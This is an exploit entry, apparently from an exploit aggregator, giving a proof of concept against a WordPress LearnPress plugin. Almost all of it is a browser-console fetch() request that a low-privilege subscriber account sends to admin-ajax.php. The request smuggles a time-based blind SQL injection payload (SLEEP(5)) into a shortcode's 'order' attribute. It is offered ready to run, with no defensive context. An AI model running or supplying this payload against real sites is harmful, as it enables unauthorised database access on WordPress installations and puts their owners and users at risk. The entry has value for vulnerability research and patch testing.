Share
## https://sploitus.com/exploit?id=WPEX-ID:58BE94E8-5C21-41B5-BF1D-9B8D9DFDA9A0
Run the below command in the developer console of the web browser while being on the blog as a subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "action=parse-media-shortcode&shortcode=[learn_press_recent_courses order=' AND (SELECT 42 FROM (SELECT(SLEEP(5)))b)' limit='1']",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));